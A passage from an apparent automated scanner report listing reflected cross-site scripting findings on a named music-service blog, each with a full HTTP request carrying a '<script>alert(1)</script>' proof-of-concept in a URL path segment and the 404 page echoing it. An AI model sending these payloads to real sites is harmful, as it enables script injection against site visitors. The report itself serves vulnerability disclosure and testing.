Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/11/fantastic-fargo.htmlf3d62<script>alert(1)</script>1d21570497f was not found on this server.</p>
...[SNIP]...

3.299. http://blog.pandora.com/pandora/archives/2010/11/sioux-falls-and.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/11/sioux-falls-and.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 23985<script>alert(1)</script>089a1722201 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora23985<script>alert(1)</script>089a1722201/archives/2010/11/sioux-falls-and.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora23985<script>alert(1)</script>089a1722201/archives/2010/11/sioux-falls-and.html was not found on this server.</p>
...[SNIP]...

3.300. http://blog.pandora.com/pandora/archives/2010/11/sioux-falls-and.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/11/sioux-falls-and.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2c61d<script>alert(1)</script>b40d4c584c3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives2c61d<script>alert(1)</script>b40d4c584c3/2010/11/sioux-falls-and.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives2c61d<script>alert(1)</script>b40d4c584c3/2010/11/sioux-falls-and.html was not found on this server.</p>
...[SNIP]...

3.301. http://blog.pandora.com/pandora/archives/2010/11/sioux-falls-and.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/11/sioux-falls-and.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5f834<script>alert(1)</script>c656c2ef387 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20105f834<script>alert(1)</script>c656c2ef387/11/sioux-falls-and.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20105f834<script>alert(1)</script>c656c2ef387/11/sioux-falls-and.html was not found on this server.</p>
...[SNIP]...

3.302. http://blog.pandora.com/pandora/archives/2010/11/sioux-falls-and.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/11/sioux-falls-and.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4a98f<script>alert(1)</script>e7866274f68 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/114a98f<script>alert(1)</script>e7866274f68/sioux-falls-and.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/114a98f<script>alert(1)</script>e7866274f68/sioux-falls-and.html was not found on this server.</p>
...[SNIP]...

3.303. http://blog.pandora.com/pandora/archives/2010/11/sioux-falls-and.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/11/sioux-falls-and.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 83ec8<script>alert(1)</script>d52c4849003 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/11/sioux-falls-and.html83ec8<script>alert(1)</script>d52c4849003 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/11/sioux-falls-and.html83ec8<script>alert(1)</script>d52c4849003 was not found on this server.</p>
...[SNIP]...

3.304. http://blog.pandora.com/pandora/archives/2010/11/town-halls-this.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/11/town-halls-this.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2056f<script>alert(1)</script>3737c338528 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora2056f<script>alert(1)</script>3737c338528/archives/2010/11/town-halls-this.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2056f<script>alert(1)</script>3737c338528/archives/2010/11/town-halls-this.html was not found on this server.</p>
...[SNIP]...

3.305. http://blog.pandora.com/pandora/archives/2010/11/town-halls-this.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/11/town-halls-this.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eb220<script>alert(1)</script>cbc4db6c337 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archiveseb220<script>alert(1)</script>cbc4db6c337/2010/11/town-halls-this.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archiveseb220<script>alert(1)</script>cbc4db6c337/2010/11/town-halls-this.html was not found on this server.</p>
...[SNIP]...

3.306. http://blog.pandora.com/pandora/archives/2010/11/town-halls-this.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/11/town-halls-this.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9fcff<script>alert(1)</script>f60856fbcd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20109fcff<script>alert(1)</script>f60856fbcd/11/town-halls-this.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 368
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20109fcff<script>alert(1)</script>f60856fbcd/11/town-halls-this.html was not found on this server.</p>
...[SNIP]...

3.307. http://blog.pandora.com/pandora/archives/2010/11/town-halls-this.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/11/town-halls-this.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b86f5<script>alert(1)</script>dbb2a670324 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/11b86f5<script>alert(1)</script>dbb2a670324/town-halls-this.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/11b86f5<script>alert(1)</script>dbb2a670324/town-halls-this.html was not found on this server.</p>
...[SNIP]...

3.308. http://blog.pandora.com/pandora/archives/2010/11/town-halls-this.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/11/town-halls-this.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 27a11<script>alert(1)</script>950dc27a619 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/11/town-halls-this.html27a11<script>alert(1)</script>950dc27a619 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/11/town-halls-this.html27a11<script>alert(1)</script>950dc27a619 was not found on this server.</p>
...[SNIP]...

3.309. http://blog.pandora.com/pandora/archives/2010/12/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/12/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bdac6<script>alert(1)</script>af1c2098b93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorabdac6<script>alert(1)</script>af1c2098b93/archives/2010/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorabdac6<script>alert(1)</script>af1c2098b93/archives/2010/12/ was not found on this server.</p>
...[SNIP]...

3.310. http://blog.pandora.com/pandora/archives/2010/12/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/12/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2a0b4<script>alert(1)</script>fcd5b5c5573 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives2a0b4<script>alert(1)</script>fcd5b5c5573/2010/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:11 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives2a0b4<script>alert(1)</script>fcd5b5c5573/2010/12/ was not found on this server.</p>
...[SNIP]...

3.311. http://blog.pandora.com/pandora/archives/2010/12/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/12/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bb68a<script>alert(1)</script>703abccb638 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010bb68a<script>alert(1)</script>703abccb638/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:13 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010bb68a<script>alert(1)</script>703abccb638/12/ was not found on this server.</p>
...[SNIP]...

3.312. http://blog.pandora.com/pandora/archives/2010/12/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/12/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8e5b4<script>alert(1)</script>6e5ab5102c8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/128e5b4<script>alert(1)</script>6e5ab5102c8/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/128e5b4<script>alert(1)</script>6e5ab5102c8/ was not found on this server.</p>
...[SNIP]...

3.313. http://blog.pandora.com/pandora/archives/2010/12/holiday-music.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/12/holiday-music.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bc67e<script>alert(1)</script>34ab249b04a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorabc67e<script>alert(1)</script>34ab249b04a/archives/2010/12/holiday-music.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 367

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorabc67e<script>alert(1)</script>34ab249b04a/archives/2010/12/holiday-music.html was not found on this server.</p>
...[SNIP]...

3.314. http://blog.pandora.com/pandora/archives/2010/12/holiday-music.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/12/holiday-music.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9cc4e<script>alert(1)</script>4b764c67cc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives9cc4e<script>alert(1)</script>4b764c67cc/2010/12/holiday-music.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:11 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 366

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives9cc4e<script>alert(1)</script>4b764c67cc/2010/12/holiday-music.html was not found on this server.</p>
...[SNIP]...

3.315. http://blog.pandora.com/pandora/archives/2010/12/holiday-music.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/12/holiday-music.html

Issue detail

